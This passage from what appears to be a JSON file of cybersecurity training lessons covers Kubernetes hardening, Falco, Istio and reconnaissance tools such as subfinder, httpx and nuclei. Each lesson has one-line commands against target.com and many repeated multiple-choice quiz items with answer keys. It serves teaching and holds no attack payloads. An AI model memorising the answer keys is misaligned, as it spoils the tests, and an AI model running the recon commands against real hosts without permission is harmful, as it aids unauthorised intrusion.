fast","Insane"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1}]},{"id":"cl2-cis-k8s","cat":"Cloud & Container","title":"CIS Kubernetes Benchmark","diff":2,"xp":150,"intro":"Harden Kubernetes against the CIS benchmark.","sections":[{"type":"text","content":"kube-bench automates CIS compliance checks for master and worker nodes."},{"type":"code","lang":"bash","content":"kube-bench run --targets=master,node\n# Checks: API server, etcd, controller, scheduler, kubelet"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"CIS benchmarks for K8s check...","opts":["Only networking","Master, node, etcd, and API server configuration","Only pods","Only secrets"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1},{"type":"quiz","q":"SPF records use which DNS type?","opts":["A","MX","TXT","CNAME"],"ans":2},{"type":"quiz","q":"What does dig +short return?","opts":["Full response","Just the answer value","Zone transfer","Server info"],"ans":1},{"type":"quiz","q":"Port 3389 is...","opts":["SSH","HTTP","RDP","DNS"],"ans":2},{"type":"quiz","q":"Censys indexes...","opts":["Social media","Internet-wide scan data and certificates","Dark web","Emails"],"ans":1},{"type":"quiz","q":"nmap -sC runs...","opts":["SYN scan","Default scripts","Connectivity check","Version detection"],"ans":1},{"type":"quiz","q":"Recon-ng is a...","opts":["Vulnerability scanner","Reconnaissance framework","Password cracker","Firewall"],"ans":1},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"WHOIS provides...","opts":["Website content","Domain registration info","Vulnerabilities","Speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration finds...","opts":["Passwords","Hidden services and attack surface","Firewall rules","Accounts"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike"],"ans":0},{"type":"quiz","q":"What tool discovers subdomains?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","Credentials"],"ans":1},{"type":"quiz","q":"Email format discovery helps...","opts":["Find passwords","Predict employee email addresses","Find servers","List vulns"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware","Emails and names from public sources","Exploit code","Packets"],"ans":1},{"type":"quiz","q":"nmap timing -T4 is...","opts":["Slowest","Paranoid","Aggressive fast","Insane"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2}]},{"id":"cl2-falco","cat":"Cloud & Container","title":"Falco Runtime Security","diff":3,"xp":200,"intro":"Detect anomalous container behavior at runtime.","sections":[{"type":"text","content":"Falco monitors system calls and alerts on: shell in container, unexpected network, privilege escalation."},{"type":"code","lang":"bash","content":"falco -r /etc/falco/falco_rules.yaml\n# Alerts on:\n# Shell spawned in container\n# Write to /etc from container\n# Unexpected outbound network"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Falco detects threats by monitoring...","opts":["Container images","System calls at runtime","Network traffic only","Log files only"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1},{"type":"quiz","q":"SPF records use which DNS type?","opts":["A","MX","TXT","CNAME"],"ans":2},{"type":"quiz","q":"What does dig +short return?","opts":["Full response","Just the answer value","Zone transfer","Server info"],"ans":1},{"type":"quiz","q":"Port 3389 is...","opts":["SSH","HTTP","RDP","DNS"],"ans":2},{"type":"quiz","q":"Censys indexes...","opts":["Social media","Internet-wide scan data and certificates","Dark web","Emails"],"ans":1},{"type":"quiz","q":"nmap -sC runs...","opts":["SYN scan","Default scripts","Connectivity check","Version detection"],"ans":1},{"type":"quiz","q":"Recon-ng is a...","opts":["Vulnerability scanner","Reconnaissance framework","Password cracker","Firewall"],"ans":1},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"WHOIS provides...","opts":["Website content","Domain registration info","Vulnerabilities","Speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration finds...","opts":["Passwords","Hidden services and attack surface","Firewall rules","Accounts"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike"],"ans":0},{"type":"quiz","q":"What tool discovers subdomains?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","Credentials"],"ans":1},{"type":"quiz","q":"Email format discovery helps...","opts":["Find passwords","Predict employee email addresses","Find servers","List vulns"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware","Emails and names from public sources","Exploit code","Packets"],"ans":1},{"type":"quiz","q":"nmap timing -T4 is...","opts":["Slowest","Paranoid","Aggressive fast","Insane"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1}]},{"id":"cl2-istio","cat":"Cloud & Container","title":"Istio Service Mesh Security","diff":3,"xp":200,"intro":"mTLS and authorization policies between microservices.","sections":[{"type":"text","content":"Istio injects sidecar proxies for encrypted service-to-service communication."},{"type":"code","lang":"bash","content":"# Enforce mTLS\napiVersion: security.istio.io/v1beta1\nkind: PeerAuthentication\nspec:\n  mtls: {mode: STRICT}"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Istio enforces...","opts":["Only logging","mTLS and authorization between services","Only routing","Only monitoring"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1},{"type":"quiz","q":"SPF records use which DNS type?","opts":["A","MX","TXT","CNAME"],"ans":2},{"type":"quiz","q":"What does dig +short return?","opts":["Full response","Just the answer value","Zone transfer","Server info"],"ans":1},{"type":"quiz","q":"Port 3389 is...","opts":["SSH","HTTP","RDP","DNS"],"ans":2},{"type":"quiz","q":"Censys indexes...","opts":["Social media","Internet-wide scan data and certificates","Dark web","Emails"],"ans":1},{"type":"quiz","q":"nmap -sC runs...","opts":["SYN scan","Default scripts","Connectivity check","Version detection"],"ans":1},{"type":"quiz","q":"Recon-ng is a...","opts":["Vulnerability scanner","Reconnaissance framework","Password cracker","Firewall"],"ans":1},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"WHOIS provides...","opts":["Website content","Domain registration info","Vulnerabilities","Speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration finds...","opts":["Passwords","Hidden services and attack surface","Firewall rules","Accounts"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike"],"ans":0},{"type":"quiz","q":"What tool discovers subdomains?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","Credentials"],"ans":1},{"type":"quiz","q":"Email format discovery helps...","opts":["Find passwords","Predict employee email addresses","Find servers","List vulns"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware","Emails and names from public sources","Exploit code","Packets"],"ans":1},{"type":"quiz","q":"nmap timing -T4 is...","opts":["Slowest","Paranoid","Aggressive fast","Insane"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1}]},{"id":"r2-httpx","cat":"Reconnaissance","title":"HTTP Probing with httpx","diff":2,"xp":150,"intro":"Probe discovered URLs for live services.","sections":[{"type":"text","content":"httpx checks which URLs are alive with status codes, titles, and tech detection."},{"type":"code","lang":"bash","content":"httpx -l urls.txt -status-code -title -tech-detect"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"httpx identifies...","opts":["Vulnerabilities","Live web services with status and technology","Passwords","Exploits"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1},{"type":"quiz","q":"SPF records use which DNS type?","opts":["A","MX","TXT","CNAME"],"ans":2},{"type":"quiz","q":"What does dig +short return?","opts":["Full response","Just the answer value","Zone transfer","Server info"],"ans":1},{"type":"quiz","q":"Port 3389 is...","opts":["SSH","HTTP","RDP","DNS"],"ans":2},{"type":"quiz","q":"Censys indexes...","opts":["Social media","Internet-wide scan data and certificates","Dark web","Emails"],"ans":1},{"type":"quiz","q":"nmap -sC runs...","opts":["SYN scan","Default scripts","Connectivity check","Version detection"],"ans":1},{"type":"quiz","q":"Recon-ng is a...","opts":["Vulnerability scanner","Reconnaissance framework","Password cracker","Firewall"],"ans":1},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"WHOIS provides...","opts":["Website content","Domain registration info","Vulnerabilities","Speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration finds...","opts":["Passwords","Hidden services and attack surface","Firewall rules","Accounts"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike"],"ans":0},{"type":"quiz","q":"What tool discovers subdomains?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","Credentials"],"ans":1},{"type":"quiz","q":"Email format discovery helps...","opts":["Find passwords","Predict employee email addresses","Find servers","List vulns"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware","Emails and names from public sources","Exploit code","Packets"],"ans":1},{"type":"quiz","q":"nmap timing -T4 is...","opts":["Slowest","Paranoid","Aggressive fast","Insane"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2}]},{"id":"r2-nuclei-recon","cat":"Reconnaissance","title":"Nuclei for Recon Templates","diff":2,"xp":150,"intro":"Use nuclei recon templates for automated discovery.","sections":[{"type":"text","content":"Nuclei has templates for tech detection, exposed panels, and misconfigs."},{"type":"code","lang":"bash","content":"nuclei -u target.com -t technologies/ -t exposures/ -t misconfiguration/"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Nuclei recon templates find...","opts":["Exploits only","Technologies, exposed panels, and misconfigs","Passwords","Network topology"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1},{"type":"quiz","q":"SPF records use which DNS type?","opts":["A","MX","TXT","CNAME"],"ans":2},{"type":"quiz","q":"What does dig +short return?","opts":["Full response","Just the answer value","Zone transfer","Server info"],"ans":1},{"type":"quiz","q":"Port 3389 is...","opts":["SSH","HTTP","RDP","DNS"],"ans":2},{"type":"quiz","q":"Censys indexes...","opts":["Social media","Internet-wide scan data and certificates","Dark web","Emails"],"ans":1},{"type":"quiz","q":"nmap -sC runs...","opts":["SYN scan","Default scripts","Connectivity check","Version detection"],"ans":1},{"type":"quiz","q":"Recon-ng is a...","opts":["Vulnerability scanner","Reconnaissance framework","Password cracker","Firewall"],"ans":1},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"WHOIS provides...","opts":["Website content","Domain registration info","Vulnerabilities","Speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration finds...","opts":["Passwords","Hidden services and attack surface","Firewall rules","Accounts"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike"],"ans":0},{"type":"quiz","q":"What tool discovers subdomains?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","Credentials"],"ans":1},{"type":"quiz","q":"Email format discovery helps...","opts":["Find passwords","Predict employee email addresses","Find servers","List vulns"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware","Emails and names from public sources","Exploit code","Packets"],"ans":1},{"type":"quiz","q":"nmap timing -T4 is...","opts":["Slowest","Paranoid","Aggressive fast","Insane"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1}]},{"id":"r2-hakrawler","cat":"Reconnaissance","title":"Web Crawling with hakrawler","diff":1,"xp":75,"intro":"Crawl websites to discover endpoints and forms.","sections":[{"type":"text","content":"hakrawler discovers URLs, forms, and JavaScript files by crawling."},{"type":"code","lang":"bash","content":"echo https://target.com | hakrawler -d 3"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Web crawling discovers...","opts":["Vulnerabilities","URLs, forms, and endpoints","Passwords","Network layout"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1},{"type":"quiz","q":"SPF records use which DNS type?","opts":["A","MX","TXT","CNAME"],"ans":2},{"type":"quiz","q":"What does dig +short return?","opts":["Full response","Just the answer value","Zone transfer","Server info"],"ans":1},{"type":"quiz","q":"Port 3389 is...","opts":["SSH","HTTP","RDP","DNS"],"ans":2},{"type":"quiz","q":"Censys indexes...","opts":["Social media","Internet-wide scan data and certificates","Dark web","Emails"],"ans":1},{"type":"quiz","q":"nmap -sC runs...","opts":["SYN scan","Default scripts","Connectivity check","Version detection"],"ans":1},{"type":"quiz","q":"Recon-ng is a...","opts":["Vulnerability scanner","Reconnaissance framework","Password cracker","Firewall"],"ans":1},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"WHOIS provides...","opts":["Website content","Domain registration info","Vulnerabilities","Speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration finds...","opts":["Passwords","Hidden services and attack surface","Firewall rules","Accounts"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike"],"ans":0},{"type":"quiz","q":"What tool discovers subdomains?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","Credentials"],"ans":1},{"type":"quiz","q":"Email format discovery helps...","opts":["Find passwords","Predict employee email addresses","Find servers","List vulns"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware","Emails and names from public sources","Exploit code","Packets"],"ans":1},{"type":"quiz","q":"nmap timing -T4 is...","opts":["Slowest","Paranoid","Aggressive fast","Insane"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1}]},{"id":"r2-gau","cat":"Reconnaissance","title":"URL Discovery with gau","diff":1,"xp":75,"intro":"Get All URLs from multiple archive sources.","sections":[{"type":"text","content":"gau queries Wayback, Common Crawl, and other archives."},{"type":"code","lang":"bash","content":"gau target.com | grep -iE '.js$|api|admin'"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"gau collects URLs from...","opts":["Port scans","Web archives and crawl datasets","DNS","Whois"],"ans":1},{"type":"quiz","q":"SPF records use which DNS type?","opts":["A","MX","TXT","CNAME"],"ans":2},{"type":"quiz","q":"What does dig +short return?","opts":["Full response","Just the answer value","Zone transfer","Server info"],"ans":1},{"type":"quiz","q":"Port 3389 is...","opts":["SSH","HTTP","RDP","DNS"],"ans":2},{"type":"quiz","q":"Censys indexes...","opts":["Social media","Internet-wide scan data and certificates","Dark web","Emails"],"ans":1},{"type":"quiz","q":"nmap -sC runs...","opts":["SYN scan","Default scripts","Connectivity check","Version detection"],"ans":1},{"type":"quiz","q":"Recon-ng is a...","opts":["Vulnerability scanner","Reconnaissance framework","Password cracker","Firewall"],"ans":1},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"WHOIS provides...","opts":["Website content","Domain registration info","Vulnerabilities","Speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration finds...","opts":["Passwords","Hidden services and attack surface","Firewall rules","Accounts"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike"],"ans":0},{"type":"quiz","q":"What tool discovers subdomains?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","Credentials"],"ans":1},{"type":"quiz","q":"Email format discovery helps...","opts":["Find passwords","Predict employee email addresses","Find servers","List vulns"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware","Emails and names from public sources","Exploit code","Packets"],"ans":1},{"type":"quiz","q":"nmap timing -T4 is...","opts":["Slowest","Paranoid","Aggressive fast","Insane"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1}]},{"id":"r2-subfinder","cat":"Reconnaissance","title":"Fast Subdomain Discovery","diff":1,"xp":75,"intro":"subfinder uses passive sources for subdomain enumeration.","sections":[{"type":"text","content":"subfinder queries 40+ sources without touching the target directly."},{"type":"code","lang":"bash","content":"subfinder -d target.com -o subs.txt"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"subfinder is...","opts":["Active","Passive (queries third-party sources)","An exploit","A WAF"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1},{"type":"quiz","q":"SPF records use which DNS type?","opts":["A","MX","TXT","CNAME"],"ans":2},{"type":"quiz","q":"What does dig +short return?","opts":["Full response","Just the answer value","Zone transfer","Server info"],"ans":1},{"type":"quiz","q":"Port 3389 is...","opts":["SSH","HTTP","RDP","DNS"],"ans":2},{"type":"quiz","q":"Censys indexes...","opts":["Social media","Internet-wide scan data and certificates","Dark web","Emails"],"ans":1},{"type":"quiz","q":"nmap -sC runs...","opts":["SYN scan","Default scripts","Connectivity check","Version detection"],"ans":1},{"type":"quiz","q":"Recon-ng is a...","opts":["Vulnerability scanner","Reconnaissance framework","Password cracker","Firewall"],"ans":1},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"WHOIS provides...","opts":["Website content","Domain registration info","Vulnerabilities","Speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration finds...","opts":["Passwords","Hidden services and attack surface","Firewall rules","Accounts"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike"],"ans":0},{"type":"quiz","q":"What tool discovers subdomains?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","Credentials"],"ans":1},{"type":"quiz","q":"Email format discovery helps...","opts":["Find passwords","Predict employee email addresses","Find servers","List vulns"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware","Emails and names from public sources","Exploit code","Packets"],"ans":1},{"type":"quiz","q":"nmap timing -T4 is...","opts":["Slowest","Paranoid","Aggressive fast","Insane"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2}]},{"id":"r2-dnsx","cat":"Reconnaissance","title":"DNS Resolution with dnsx","diff":2,"xp":150,"intro":"Resolve discovered subdomains to find live hosts.","sections":[{"type":"text","content":"dnsx filters subdomain lists to only those that resolve."},{"type":"code","lang":"bash","content":"subfinder -d target.com | dnsx -a -resp"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"dnsx filters...","opts":["By port","Subdomains to only those with DNS records","By size","By age"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1},{"type":"quiz","q":"SPF records use which DNS 